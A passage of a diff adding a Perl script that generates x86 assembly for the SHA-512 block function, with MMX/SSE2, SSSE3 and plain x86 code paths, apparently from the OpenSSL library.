+$sse2=0;
+for (@ARGV) { $sse2=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+&external_label("OPENSSL_ia32cap_P") if ($sse2);
+
+$Tlo=&DWP(0,"esp");	$Thi=&DWP(4,"esp");
+$Alo=&DWP(8,"esp");	$Ahi=&DWP(8+4,"esp");
+$Blo=&DWP(16,"esp");	$Bhi=&DWP(16+4,"esp");
+$Clo=&DWP(24,"esp");	$Chi=&DWP(24+4,"esp");
+$Dlo=&DWP(32,"esp");	$Dhi=&DWP(32+4,"esp");
+$Elo=&DWP(40,"esp");	$Ehi=&DWP(40+4,"esp");
+$Flo=&DWP(48,"esp");	$Fhi=&DWP(48+4,"esp");
+$Glo=&DWP(56,"esp");	$Ghi=&DWP(56+4,"esp");
+$Hlo=&DWP(64,"esp");	$Hhi=&DWP(64+4,"esp");
+$K512="ebp";
+
+$Asse2=&QWP(0,"esp");
+$Bsse2=&QWP(8,"esp");
+$Csse2=&QWP(16,"esp");
+$Dsse2=&QWP(24,"esp");
+$Esse2=&QWP(32,"esp");
+$Fsse2=&QWP(40,"esp");
+$Gsse2=&QWP(48,"esp");
+$Hsse2=&QWP(56,"esp");
+
+$A="mm0";	# B-D and
+$E="mm4";	# F-H are commonly loaded to respectively mm1-mm3 and
+		# mm5-mm7, but it's done on on-demand basis...
+$BxC="mm2";	# ... except for B^C
+
+sub BODY_00_15_sse2 {
+    my $phase=shift;
+
+	#&movq	("mm5",$Fsse2);			# load f
+	#&movq	("mm6",$Gsse2);			# load g
+
+	&movq	("mm1",$E);			# %mm1 is sliding right
+	 &pxor	("mm5","mm6");			# f^=g
+	&psrlq	("mm1",14);
+	 &movq	($Esse2,$E);			# modulo-scheduled save e
+	 &pand	("mm5",$E);			# f&=e
+	&psllq	($E,23);			# $E is sliding left
+	 &movq	($A,"mm3")			if ($phase<2);
+	 &movq	(&QWP(8*9,"esp"),"mm7")		# save X[i]
+	&movq	("mm3","mm1");			# %mm3 is T1
+	 &psrlq	("mm1",4);
+	 &pxor	("mm5","mm6");			# Ch(e,f,g)
+	&pxor	("mm3",$E);
+	 &psllq	($E,23);
+	&pxor	("mm3","mm1");
+	 &movq	($Asse2,$A);			# modulo-scheduled save a
+	 &paddq	("mm7","mm5");			# X[i]+=Ch(e,f,g)
+	&pxor	("mm3",$E);
+	 &psrlq	("mm1",23);
+	 &paddq	("mm7",$Hsse2);			# X[i]+=h
+	&pxor	("mm3","mm1");
+	 &psllq	($E,4);
+	 &paddq	("mm7",QWP(0,$K512));		# X[i]+=K512[i]
+	&pxor	("mm3",$E);			# T1=Sigma1_512(e)
+
+	 &movq	($E,$Dsse2);			# e = load d, e in next round
+	&paddq	("mm3","mm7");			# T1+=X[i]
+	 &movq	("mm5",$A);			# %mm5 is sliding right
+	 &psrlq	("mm5",28);
+	&paddq	($E,"mm3");			# d += T1
+	 &movq	("mm6",$A);			# %mm6 is sliding left
+	 &movq	("mm7","mm5");
+	 &psllq	("mm6",25);
+	&movq	("mm1",$Bsse2);			# load b
+	 &psrlq	("mm5",6);
+	 &pxor	("mm7","mm6");
+	&sub	("esp",8);
+	 &psllq	("mm6",5);
+	 &pxor	("mm7","mm5");
+	&pxor	($A,"mm1");			# a^b, b^c in next round
+	 &psrlq	("mm5",5);
+	 &pxor	("mm7","mm6");
+	&pand	($BxC,$A);			# (b^c)&(a^b)
+	 &psllq	("mm6",6);
+	 &pxor	("mm7","mm5");
+	&pxor	($BxC,"mm1");			# [h=]Maj(a,b,c)
+	 &pxor	("mm6","mm7");			# Sigma0_512(a)
+	 &movq	("mm7",&QWP(8*(9+16-1),"esp"))	if ($phase!=0);	# pre-fetch
+	 &movq	("mm5",$Fsse2)			if ($phase==0);	# load f
+
+    if ($phase>1) {
+	&paddq	($BxC,"mm6");			# h+=Sigma0(a)
+	 &add	($K512,8);
+	#&paddq	($BxC,"mm3");			# h+=T1
+
+	($A,$BxC) = ($BxC,$A);			# rotate registers
+    } else {
+	&paddq	("mm3",$BxC);			# T1+=Maj(a,b,c)
+	 &movq	($BxC,$A);
+	 &add	($K512,8);
+	&paddq	("mm3","mm6");			# T1+=Sigma0(a)
+	 &movq	("mm6",$Gsse2)			if ($phase==0);	# load g
+	#&movq	($A,"mm3");			# h=T1
+    }
+}
+
+sub BODY_00_15_x86 {
+	#define Sigma1(x)	(ROTR((x),14) ^ ROTR((x),18)  ^ ROTR((x),41))
+	#	LO		lo>>14^hi<<18 ^ lo>>18^hi<<14 ^ hi>>9^lo<<23
+	#	HI		hi>>14^lo<<18 ^ hi>>18^lo<<14 ^ lo>>9^hi<<23
+	&mov	("ecx",$Elo);
+	&mov	("edx",$Ehi);
+	&mov	("esi","ecx");
+
+	&shr	("ecx",9);	# lo>>9
+	&mov	("edi","edx");
+	&shr	("edx",9);	# hi>>9
+	&mov	("ebx","ecx");
+	&shl	("esi",14);	# lo<<14
+	&mov	("eax","edx");
+	&shl	("edi",14);	# hi<<14
+	&xor	("ebx","esi");
+
+	&shr	("ecx",14-9);	# lo>>14
+	&xor	("eax","edi");
+	&shr	("edx",14-9);	# hi>>14
+	&xor	("eax","ecx");
+	&shl	("esi",18-14);	# lo<<18
+	&xor	("ebx","edx");
+	&shl	("edi",18-14);	# hi<<18
+	&xor	("ebx","esi");
+
+	&shr	("ecx",18-14);	# lo>>18
+	&xor	("eax","edi");
+	&shr	("edx",18-14);	# hi>>18
+	&xor	("eax","ecx");
+	&shl	("esi",23-18);	# lo<<23
+	&xor	("ebx","edx");
+	&shl	("edi",23-18);	# hi<<23
+	&xor	("eax","esi");
+	&xor	("ebx","edi");			# T1 = Sigma1(e)
+
+	&mov	("ecx",$Flo);
+	&mov	("edx",$Fhi);
+	&mov	("esi",$Glo);
+	&mov	("edi",$Ghi);
+	 &add	("eax",$Hlo);
+	 &adc	("ebx",$Hhi);			# T1 += h
+	&xor	("ecx","esi");
+	&xor	("edx","edi");
+	&and	("ecx",$Elo);
+	&and	("edx",$Ehi);
+	 &add	("eax",&DWP(8*(9+15)+0,"esp"));
+	 &adc	("ebx",&DWP(8*(9+15)+4,"esp"));	# T1 += X[0]
+	&xor	("ecx","esi");
+	&xor	("edx","edi");			# Ch(e,f,g) = (f^g)&e)^g
+
+	&mov	("esi",&DWP(0,$K512));
+	&mov	("edi",&DWP(4,$K512));		# K[i]
+	&add	("eax","ecx");
+	&adc	("ebx","edx");			# T1 += Ch(e,f,g)
+	&mov	("ecx",$Dlo);
+	&mov	("edx",$Dhi);
+	&add	("eax","esi");
+	&adc	("ebx","edi");			# T1 += K[i]
+	&mov	($Tlo,"eax");
+	&mov	($Thi,"ebx");			# put T1 away
+	&add	("eax","ecx");
+	&adc	("ebx","edx");			# d += T1
+
+	#define Sigma0(x)	(ROTR((x),28) ^ ROTR((x),34) ^ ROTR((x),39))
+	#	LO		lo>>28^hi<<4  ^ hi>>2^lo<<30 ^ hi>>7^lo<<25
+	#	HI		hi>>28^lo<<4  ^ lo>>2^hi<<30 ^ lo>>7^hi<<25
+	&mov	("ecx",$Alo);
+	&mov	("edx",$Ahi);
+	&mov	($Dlo,"eax");
+	&mov	($Dhi,"ebx");
+	&mov	("esi","ecx");
+
+	&shr	("ecx",2);	# lo>>2
+	&mov	("edi","edx");
+	&shr	("edx",2);	# hi>>2
+	&mov	("ebx","ecx");
+	&shl	("esi",4);	# lo<<4
+	&mov	("eax","edx");
+	&shl	("edi",4);	# hi<<4
+	&xor	("ebx","esi");
+
+	&shr	("ecx",7-2);	# lo>>7
+	&xor	("eax","edi");
+	&shr	("edx",7-2);	# hi>>7
+	&xor	("ebx","ecx");
+	&shl	("esi",25-4);	# lo<<25
+	&xor	("eax","edx");
+	&shl	("edi",25-4);	# hi<<25
+	&xor	("eax","esi");
+
+	&shr	("ecx",28-7);	# lo>>28
+	&xor	("ebx","edi");
+	&shr	("edx",28-7);	# hi>>28
+	&xor	("eax","ecx");
+	&shl	("esi",30-25);	# lo<<30
+	&xor	("ebx","edx");
+	&shl	("edi",30-25);	# hi<<30
+	&xor	("eax","esi");
+	&xor	("ebx","edi");			# Sigma0(a)
+
+	&mov	("ecx",$Alo);
+	&mov	("edx",$Ahi);
+	&mov	("esi",$Blo);
+	&mov	("edi",$Bhi);
+	&add	("eax",$Tlo);
+	&adc	("ebx",$Thi);			# T1 = Sigma0(a)+T1
+	&or	("ecx","esi");
+	&or	("edx","edi");
+	&and	("ecx",$Clo);
+	&and	("edx",$Chi);
+	&and	("esi",$Alo);
+	&and	("edi",$Ahi);
+	&or	("ecx","esi");
+	&or	("edx","edi");			# Maj(a,b,c) = ((a|b)&c)|(a&b)
+
+	&add	("eax","ecx");
+	&adc	("ebx","edx");			# T1 += Maj(a,b,c)
+	&mov	($Tlo,"eax");
+	&mov	($Thi,"ebx");
+
+	&mov	(&LB("edx"),&BP(0,$K512));	# pre-fetch LSB of *K
+	&sub	("esp",8);
+	&lea	($K512,&DWP(8,$K512));		# K++
+}
+
+
+&function_begin("sha512_block_data_order");
+	&mov	("esi",wparam(0));	# ctx
+	&mov	("edi",wparam(1));	# inp
+	&mov	("eax",wparam(2));	# num
+	&mov	("ebx","esp");		# saved sp
+
+	&call	(&label("pic_point"));	# make it PIC!
+&set_label("pic_point");
+	&blindpop($K512);
+	&lea	($K512,&DWP(&label("K512")."-".&label("pic_point"),$K512));
+
+	&sub	("esp",16);
+	&and	("esp",-64);
+
+	&shl	("eax",7);
+	&add	("eax","edi");
+	&mov	(&DWP(0,"esp"),"esi");	# ctx
+	&mov	(&DWP(4,"esp"),"edi");	# inp
+	&mov	(&DWP(8,"esp"),"eax");	# inp+num*128
+	&mov	(&DWP(12,"esp"),"ebx");	# saved sp
+
+if ($sse2) {
+	&picmeup("edx","OPENSSL_ia32cap_P",$K512,&label("K512"));
+	&mov	("ecx",&DWP(0,"edx"));
+	&test	("ecx",1<<26);
+	&jz	(&label("loop_x86"));
+
+	&mov	("edx",&DWP(4,"edx"));
+
+	# load ctx->h[0-7]
+	&movq	($A,&QWP(0,"esi"));
+	 &and	("ecx",1<<24);		# XMM registers availability
+	&movq	("mm1",&QWP(8,"esi"));
+	 &and	("edx",1<<9);		# SSSE3 bit
+	&movq	($BxC,&QWP(16,"esi"));
+	 &or	("ecx","edx");
+	&movq	("mm3",&QWP(24,"esi"));
+	&movq	($E,&QWP(32,"esi"));
+	&movq	("mm5",&QWP(40,"esi"));
+	&movq	("mm6",&QWP(48,"esi"));
+	&movq	("mm7",&QWP(56,"esi"));
+	&cmp	("ecx",1<<24|1<<9);
+	&je	(&label("SSSE3"));
+	&sub	("esp",8*10);
+	&jmp	(&label("loop_sse2"));
+
+&set_label("loop_sse2",16);
+	#&movq	($Asse2,$A);
+	&movq	($Bsse2,"mm1");
+	&movq	($Csse2,$BxC);
+	&movq	($Dsse2,"mm3");
+	#&movq	($Esse2,$E);
+	&movq	($Fsse2,"mm5");
+	&movq	($Gsse2,"mm6");
+	&pxor	($BxC,"mm1");			# magic
+	&movq	($Hsse2,"mm7");
+	&movq	("mm3",$A);			# magic
+
+	&mov	("eax",&DWP(0,"edi"));
+	&mov	("ebx",&DWP(4,"edi"));
+	&add	("edi",8);
+	&mov	("edx",15);			# counter
+	&bswap	("eax");
+	&bswap	("ebx");
+	&jmp	(&label("00_14_sse2"));
+
+&set_label("00_14_sse2",16);
+	&movd	("mm1","eax");
+	&mov	("eax",&DWP(0,"edi"));
+	&movd	("mm7","ebx");
+	&mov	("ebx",&DWP(4,"edi"));
+	&add	("edi",8);
+	&bswap	("eax");
+	&bswap	("ebx");
+	&punpckldq("mm7","mm1");
+
+	&BODY_00_15_sse2();
+
+	&dec	("edx");
+	&jnz	(&label("00_14_sse2"));
+
+	&movd	("mm1","eax");
+	&movd	("mm7","ebx");
+	&punpckldq("mm7","mm1");
+
+	&BODY_00_15_sse2(1);
+
+	&pxor	($A,$A);			# A is in %mm3
+	&mov	("edx",32);			# counter
+	&jmp	(&label("16_79_sse2"));
+
+&set_label("16_79_sse2",16);
+    for ($j=0;$j<2;$j++) {			# 2x unroll
+	#&movq	("mm7",&QWP(8*(9+16-1),"esp"));	# prefetched in BODY_00_15 
+	&movq	("mm5",&QWP(8*(9+16-14),"esp"));
+	&movq	("mm1","mm7");
+	&psrlq	("mm7",1);
+	 &movq	("mm6","mm5");
+	 &psrlq	("mm5",6);
+	&psllq	("mm1",56);
+	 &paddq	($A,"mm3");			# from BODY_00_15
+	 &movq	("mm3","mm7");
+	&psrlq	("mm7",7-1);
+	 &pxor	("mm3","mm1");
+	 &psllq	("mm1",63-56);
+	&pxor	("mm3","mm7");
+	 &psrlq	("mm7",8-7);
+	&pxor	("mm3","mm1");
+	 &movq	("mm1","mm5");
+	 &psrlq	("mm5",19-6);
+	&pxor	("mm7","mm3");			# sigma0
+
+	 &psllq	("mm6",3);
+	 &pxor	("mm1","mm5");
+	&paddq	("mm7",&QWP(8*(9+16),"esp"));
+	 &pxor	("mm1","mm6");
+	 &psrlq	("mm5",61-19);
+	&paddq	("mm7",&QWP(8*(9+16-9),"esp"));
+	 &pxor	("mm1","mm5");
+	 &psllq	("mm6",45-3);
+	&movq	("mm5",$Fsse2);			# load f
+	 &pxor	("mm1","mm6");			# sigma1
+	&movq	("mm6",$Gsse2);			# load g
+
+	&paddq	("mm7","mm1");			# X[i]
+	#&movq	(&QWP(8*9,"esp"),"mm7");	# moved to BODY_00_15
+
+	&BODY_00_15_sse2(2);
+    }
+	&dec	("edx");
+	&jnz	(&label("16_79_sse2"));
+
+	#&movq	($A,$Asse2);
+	&paddq	($A,"mm3");			# from BODY_00_15
+	&movq	("mm1",$Bsse2);
+	#&movq	($BxC,$Csse2);
+	&movq	("mm3",$Dsse2);
+	#&movq	($E,$Esse2);
+	&movq	("mm5",$Fsse2);
+	&movq	("mm6",$Gsse2);
+	&movq	("mm7",$Hsse2);
+
+	&pxor	($BxC,"mm1");			# de-magic
+	&paddq	($A,&QWP(0,"esi"));
+	&paddq	("mm1",&QWP(8,"esi"));
+	&paddq	($BxC,&QWP(16,"esi"));
+	&paddq	("mm3",&QWP(24,"esi"));
+	&paddq	($E,&QWP(32,"esi"));
+	&paddq	("mm5",&QWP(40,"esi"));
+	&paddq	("mm6",&QWP(48,"esi"));
+	&paddq	("mm7",&QWP(56,"esi"));
+
+	&mov	("eax",8*80);
+	&movq	(&QWP(0,"esi"),$A);
+	&movq	(&QWP(8,"esi"),"mm1");
+	&movq	(&QWP(16,"esi"),$BxC);
+	&movq	(&QWP(24,"esi"),"mm3");
+	&movq	(&QWP(32,"esi"),$E);
+	&movq	(&QWP(40,"esi"),"mm5");
+	&movq	(&QWP(48,"esi"),"mm6");
+	&movq	(&QWP(56,"esi"),"mm7");
+
+	&lea	("esp",&DWP(0,"esp","eax"));	# destroy frame
+	&sub	($K512,"eax");			# rewind K
+
+	&cmp	("edi",&DWP(8*10+8,"esp"));	# are we done yet?
+	&jb	(&label("loop_sse2"));
+
+	&mov	("esp",&DWP(8*10+12,"esp"));	# restore sp
+	&emms	();
+&function_end_A();
+
+&set_label("SSSE3",32);
+{ my ($cnt,$frame)=("ecx","edx");
+  my @X=map("xmm$_",(0..7));
+  my $j;
+  my $i=0;
+
+	&lea	($frame,&DWP(-64,"esp"));
+	&sub	("esp",256);
+
+	# fixed stack frame layout
+	#
+	# +0	A B C D E F G H		# backing store
+	# +64	X[0]+K[i] .. X[15]+K[i]	# XMM->MM xfer area
+	# +192				# XMM off-load ring buffer
+	# +256				# saved parameters
+
+	&movdqa		(@X[1],&QWP(80*8,$K512));		# byte swap mask
+	&movdqu		(@X[0],&QWP(0,"edi"));
+	&pshufb		(@X[0],@X[1]);
+    for ($j=0;$j<8;$j++) {
+	&movdqa		(&QWP(16*(($j-1)%4),$frame),@X[3])	if ($j>4); # off-load
+	&movdqa		(@X[3],&QWP(16*($j%8),$K512));
+	&movdqa		(@X[2],@X[1])				if ($j<7); # perpetuate byte swap mask
+	&movdqu		(@X[1],&QWP(16*($j+1),"edi"))		if ($j<7); # next input
+	&movdqa		(@X[1],&QWP(16*(($j+1)%4),$frame))	if ($j==7);# restore @X[0]
+	&paddq		(@X[3],@X[0]);
+	&pshufb		(@X[1],@X[2])				if ($j<7);
+	&movdqa		(&QWP(16*($j%8)-128,$frame),@X[3]);	# xfer X[i]+K[i]
+
+	push(@X,shift(@X));					# rotate(@X)
+    }
+	#&jmp		(&label("loop_ssse3"));
+	&nop		();
+
+&set_label("loop_ssse3",32);
+	&movdqa		(@X[2],&QWP(16*(($j+1)%4),$frame));	# pre-restore @X[1]
+	&movdqa		(&QWP(16*(($j-1)%4),$frame),@X[3]);	# off-load @X[3]
+	&lea		($K512,&DWP(16*8,$K512));
+
+	#&movq	($Asse2,$A);			# off-load A-H
+	&movq	($Bsse2,"mm1");
+	 &mov	("ebx","edi");
+	&movq	($Csse2,$BxC);
+	 &lea	("edi",&DWP(128,"edi"));	# advance input
+	&movq	($Dsse2,"mm3");
+	 &cmp	("edi","eax");
+	#&movq	($Esse2,$E);
+	&movq	($Fsse2,"mm5");
+	 &cmovb	("ebx","edi");
+	&movq	($Gsse2,"mm6");
+	 &mov	("ecx",4);			# loop counter
+	&pxor	($BxC,"mm1");			# magic
+	&movq	($Hsse2,"mm7");
+	&pxor	("mm3","mm3");			# magic
+
+	&jmp		(&label("00_47_ssse3"));
+
+sub BODY_00_15_ssse3 {		# "phase-less" copy of BODY_00_15_sse2
+	(
+	'&movq	("mm1",$E)',				# %mm1 is sliding right
+	'&movq	("mm7",&QWP(((-8*$i)%128)-128,$frame))',# X[i]+K[i]
+	 '&pxor	("mm5","mm6")',				# f^=g
+	'&psrlq	("mm1",14)',
+	 '&movq	(&QWP(8*($i+4)%64,"esp"),$E)',		# modulo-scheduled save e
+	 '&pand	("mm5",$E)',				# f&=e
+	'&psllq	($E,23)',				# $E is sliding left
+	'&paddq	($A,"mm3")',				# [h+=Maj(a,b,c)]
+	'&movq	("mm3","mm1")',				# %mm3 is T1
+	 '&psrlq("mm1",4)',
+	 '&pxor	("mm5","mm6")',				# Ch(e,f,g)
+	'&pxor	("mm3",$E)',
+	 '&psllq($E,23)',
+	'&pxor	("mm3","mm1")',
+	 '&movq	(&QWP(8*$i%64,"esp"),$A)',		# modulo-scheduled save a
+	 '&paddq("mm7","mm5")',				# X[i]+=Ch(e,f,g)
+	'&pxor	("mm3",$E)',
+	 '&psrlq("mm1",23)',
+	 '&paddq("mm7",&QWP(8*($i+7)%64,"esp"))',	# X[i]+=h
+	'&pxor	("mm3","mm1")',
+	 '&psllq($E,4)',
+	'&pxor	("mm3",$E)',				# T1=Sigma1_512(e)
+
+	 '&movq	($E,&QWP(8*($i+3)%64,"esp"))',		# e = load d, e in next round
+	'&paddq	("mm3","mm7")',				# T1+=X[i]
+	 '&movq	("mm5",$A)',				# %mm5 is sliding right
+	 '&psrlq("mm5",28)',
+	'&paddq	($E,"mm3")',				# d += T1
+	 '&movq	("mm6",$A)',				# %mm6 is sliding left
+	 '&movq	("mm7","mm5")',
+	 '&psllq("mm6",25)',
+	'&movq	("mm1",&QWP(8*($i+1)%64,"esp"))',	# load b
+	 '&psrlq("mm5",6)',
+	 '&pxor	("mm7","mm6")',
+	 '&psllq("mm6",5)',
+	 '&pxor	("mm7","mm5")',
+	'&pxor	($A,"mm1")',				# a^b, b^c in next round
+	 '&psrlq("mm5",5)',
+	 '&pxor	("mm7","mm6")',
+	'&pand	($BxC,$A)',				# (b^c)&(a^b)
+	 '&psllq("mm6",6)',
+	 '&pxor	("mm7","mm5")',
+	'&pxor	($BxC,"mm1")',				# [h=]Maj(a,b,c)
+	 '&pxor	("mm6","mm7")',				# Sigma0_512(a)
+	 '&movq	("mm5",&QWP(8*($i+5-1)%64,"esp"))',	# pre-load f
+	'&paddq	($BxC,"mm6")',				# h+=Sigma0(a)
+	 '&movq	("mm6",&QWP(8*($i+6-1)%64,"esp"))',	# pre-load g
+
+	'($A,$BxC) = ($BxC,$A); $i--;'
+	);
+}
+
+&set_label("00_47_ssse3",32);
+
+    for(;$j<16;$j++) {
+	my ($t0,$t2,$t1)=@X[2..4];
+	my @insns = (&BODY_00_15_ssse3(),&BODY_00_15_ssse3());
+
+	&movdqa		($t2,@X[5]);
+	&movdqa		(@X[1],$t0);			# restore @X[1]
+	&palignr	($t0,@X[0],8);			# X[1..2]
+	&movdqa		(&QWP(16*($j%4),$frame),@X[4]);	# off-load @X[4]
+	 &palignr	($t2,@X[4],8);			# X[9..10]
+
+	&movdqa		($t1,$t0);
+	&psrlq		($t0,7);
+	 &paddq		(@X[0],$t2);			# X[0..1] += X[9..10]
+	&movdqa		($t2,$t1);
+	&psrlq		($t1,1);
+	&psllq		($t2,64-8);
+	&pxor		($t0,$t1);
+	&psrlq		($t1,8-1);
+	&pxor		($t0,$t2);
+	&psllq		($t2,8-1);
+	&pxor		($t0,$t1);
+	 &movdqa	($t1,@X[7]);
+	&pxor		($t0,$t2);			# sigma0(X[1..2])
+	 &movdqa	($t2,@X[7]);
+	 &psrlq		($t1,6);
+	&paddq		(@X[0],$t0);			# X[0..1] += sigma0(X[1..2])
+
+	&movdqa		($t0,@X[7]);
+	&psrlq		($t2,19);
+	&psllq		($t0,64-61);
+	&pxor		($t1,$t2);
+	&psrlq		($t2,61-19);
+	&pxor		($t1,$t0);
+	&psllq		($t0,61-19);
+	&pxor		($t1,$t2);
+	&movdqa		($t2,&QWP(16*(($j+2)%4),$frame));# pre-restore @X[1]
+	&pxor		($t1,$t0);			# sigma0(X[1..2])
+	&movdqa		($t0,&QWP(16*($j%8),$K512));
+	 eval(shift(@insns));
+	&paddq		(@X[0],$t1);			# X[0..1] += sigma0(X[14..15])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&paddq		($t0,@X[0]);
+	 foreach(@insns) { eval; }
+	&movdqa		(&QWP(16*($j%8)-128,$frame),$t0);# xfer X[i]+K[i]
+
+	push(@X,shift(@X));				# rotate(@X)
+    }
+	&lea		($K512,&DWP(16*8,$K512));
+	&dec		("ecx");
+	&jnz		(&label("00_47_ssse3"));
+
+	&movdqa		(@X[1],&QWP(0,$K512));		# byte swap mask
+	&lea		($K512,&DWP(-80*8,$K512));	# rewind
+	&movdqu		(@X[0],&QWP(0,"ebx"));
+	&pshufb		(@X[0],@X[1]);
+
+    for ($j=0;$j<8;$j++) {	# load next or same block
+	my @insns = (&BODY_00_15_ssse3(),&BODY_00_15_ssse3());
+
+	&movdqa		(&QWP(16*(($j-1)%4),$frame),@X[3])	if ($j>4); # off-load
+	&movdqa		(@X[3],&QWP(16*($j%8),$K512));
+	&movdqa		(@X[2],@X[1])				if ($j<7); # perpetuate byte swap mask
+	&movdqu		(@X[1],&QWP(16*($j+1),"ebx"))		if ($j<7); # next input
+	&movdqa		(@X[1],&QWP(16*(($j+1)%4),$frame))	if ($j==7);# restore @X[0]
+	&paddq		(@X[3],@X[0]);
+	&pshufb		(@X[1],@X[2])				if ($j<7);
+	 foreach(@insns) { eval; }
+	&movdqa		(&QWP(16*($j%8)-128,$frame),@X[3]);# xfer X[i]+K[i]
+
+	push(@X,shift(@X));				# rotate(@X)
+    }
+
+	#&movq	($A,$Asse2);			# load A-H
+	&movq	("mm1",$Bsse2);
+	&paddq	($A,"mm3");			# from BODY_00_15
+	#&movq	($BxC,$Csse2);
+	&movq	("mm3",$Dsse2);
+	#&movq	($E,$Esse2);
+	#&movq	("mm5",$Fsse2);
+	#&movq	("mm6",$Gsse2);
+	&movq	("mm7",$Hsse2);
+
+	&pxor	($BxC,"mm1");			# de-magic
+	&paddq	($A,&QWP(0,"esi"));
+	&paddq	("mm1",&QWP(8,"esi"));
+	&paddq	($BxC,&QWP(16,"esi"));
+	&paddq	("mm3",&QWP(24,"esi"));
+	&paddq	($E,&QWP(32,"esi"));
+	&paddq	("mm5",&QWP(40,"esi"));
+	&paddq	("mm6",&QWP(48,"esi"));
+	&paddq	("mm7",&QWP(56,"esi"));
+
+	&movq	(&QWP(0,"esi"),$A);
+	&movq	(&QWP(8,"esi"),"mm1");
+	&movq	(&QWP(16,"esi"),$BxC);
+	&movq	(&QWP(24,"esi"),"mm3");
+	&movq	(&QWP(32,"esi"),$E);
+	&movq	(&QWP(40,"esi"),"mm5");
+	&movq	(&QWP(48,"esi"),"mm6");
+	&movq	(&QWP(56,"esi"),"mm7");
+
+    	&cmp	("edi","eax")			# are we done yet?
+	&jb	(&label("loop_ssse3"));
+
+	&mov	("esp",&DWP(64+12,$frame));	# restore sp
+	&emms	();
+}
+&function_end_A();
+}
+&set_label("loop_x86",16);
+    # copy input block to stack reversing byte and qword order
+    for ($i=0;$i<8;$i++) {
+	&mov	("eax",&DWP($i*16+0,"edi"));
+	&mov	("ebx",&DWP($i*16+4,"edi"));
+	&mov	("ecx",&DWP($i*16+8,"edi"));
+	&mov	("edx",&DWP($i*16+12,"edi"));
+	&bswap	("eax");
+	&bswap	("ebx");
+	&bswap	("ecx");
+	&bswap	("edx");
+	&push	("eax");
+	&push	("ebx");
+	&push	("ecx");
+	&push	("edx");
+    }
+	&add	("edi",128);
+	&sub	("esp",9*8);		# place for T,A,B,C,D,E,F,G,H
+	&mov	(&DWP(8*(9+16)+4,"esp"),"edi");
+
+	# copy ctx->h[0-7] to A,B,C,D,E,F,G,H on stack
+	&lea	("edi",&DWP(8,"esp"));
+	&mov	("ecx",16);
+	&data_word(0xA5F3F689);		# rep movsd
+
+&set_label("00_15_x86",16);
+	&BODY_00_15_x86();
+
+	&cmp	(&LB("edx"),0x94);
+	&jne	(&label("00_15_x86"));
+
+&set_label("16_79_x86",16);
+	#define sigma0(x)	(ROTR((x),1)  ^ ROTR((x),8)  ^ ((x)>>7))
+	#	LO		lo>>1^hi<<31  ^ lo>>8^hi<<24 ^ lo>>7^hi<<25
+	#	HI		hi>>1^lo<<31  ^ hi>>8^lo<<24 ^ hi>>7
+	&mov	("ecx",&DWP(8*(9+15+16-1)+0,"esp"));
+	&mov	("edx",&DWP(8*(9+15+16-1)+4,"esp"));
+	&mov	("esi","ecx");
+
+	&shr	("ecx",1);	# lo>>1
+	&mov	("edi","edx");
+	&shr	("edx",1);	# hi>>1
+	&mov	("eax","ecx");
+	&shl	("esi",24);	# lo<<24
+	&mov	("ebx","edx");
+	&shl	("edi",24);	# hi<<24
+	&xor	("ebx","esi");
+
+	&shr	("ecx",7-1);	# lo>>7
+	&xor	("eax","edi");
+	&shr	("edx",7-1);	# hi>>7
+	&xor	("eax","ecx");
+	&shl	("esi",31-24);	# lo<<31
+	&xor	("ebx","edx");
+	&shl	("edi",25-24);	# hi<<25
+	&xor	("ebx","esi");
+
+	&shr	("ecx",8-7);	# lo>>8
+	&xor	("eax","edi");
+	&shr	("edx",8-7);	# hi>>8
+	&xor	("eax","ecx");
+	&shl	("edi",31-25);	# hi<<31
+	&xor	("ebx","edx");
+	&xor	("eax","edi");			# T1 = sigma0(X[-15])
+
+	&mov	(&DWP(0,"esp"),"eax");
+	&mov	(&DWP(4,"esp"),"ebx");		# put T1 away
+
+	#define sigma1(x)	(ROTR((x),19) ^ ROTR((x),61) ^ ((x)>>6))
+	#	LO		lo>>19^hi<<13 ^ hi>>29^lo<<3 ^ lo>>6^hi<<26
+	#	HI		hi>>19^lo<<13 ^ lo>>29^hi<<3 ^ hi>>6
+	&mov	("ecx",&DWP(8*(9+15+16-14)+0,"esp"));
+	&mov	("edx",&DWP(8*(9+15+16-14)+4,"esp"));
+	&mov	("esi","ecx");
+
+	&shr	("ecx",6);	# lo>>6
+	&mov	("edi","edx");
+	&shr	("edx",6);	# hi>>6
+	&mov	("eax","ecx");
+	&shl	("esi",3);	# lo<<3
+	&mov	("ebx","edx");
+	&shl	("edi",3);	# hi<<3
+	&xor	("eax","esi");
+
+	&shr	("ecx",19-6);	# lo>>19
+	&xor	("ebx","edi");
+	&shr	("edx",19-6);	# hi>>19
+	&xor	("eax","ecx");
+	&shl	("esi",13-3);	# lo<<13
+	&xor	("ebx","edx");
+	&shl	("edi",13-3);	# hi<<13
+	&xor	("ebx","esi");
+
+	&shr	("ecx",29-19);	# lo>>29
+	&xor	("eax","edi");
+	&shr	("edx",29-19);	# hi>>29
+	&xor	("ebx","ecx");
+	&shl	("edi",26-13);	# hi<<26
+	&xor	("eax","edx");
+	&xor	("eax","edi");			# sigma1(X[-2])
+
+	&mov	("ecx",&DWP(8*(9+15+16)+0,"esp"));
+	&mov	("edx",&DWP(8*(9+15+16)+4,"esp"));
+	&add	("eax",&DWP(0,"esp"));
+	&adc	("ebx",&DWP(4,"esp"));		# T1 = sigma1(X[-2])+T1
+	&mov	("esi",&DWP(8*(9+15+16-9)+0,"esp"));
+	&mov	("edi",&DWP(8*(9+15+16-9)+4,"esp"));
+	&add	("eax","ecx");
+	&adc	("ebx","edx");			# T1 += X[-16]
+	&add	("eax","esi");
+	&adc	("ebx","edi");			# T1 += X[-7]
+	&mov	(&DWP(8*(9+15)+0,"esp"),"eax");
+	&mov	(&DWP(8*(9+15)+4,"esp"),"ebx");	# save X[0]
+
+	&BODY_00_15_x86();
+
+	&cmp	(&LB("edx"),0x17);
+	&jne	(&label("16_79_x86"));
+
+	&mov	("esi",&DWP(8*(9+16+80)+0,"esp"));# ctx
+	&mov	("edi",&DWP(8*(9+16+80)+4,"esp"));# inp
+    for($i=0;$i<4;$i++) {
+	&mov	("eax",&DWP($i*16+0,"esi"));
+	&mov	("ebx",&DWP($i*16+4,"esi"));
+	&mov	("ecx",&DWP($i*16+8,"esi"));
+	&mov	("edx",&DWP($i*16+12,"esi"));
+	&add	("eax",&DWP(8+($i*16)+0,"esp"));
+	&adc	("ebx",&DWP(8+($i*16)+4,"esp"));
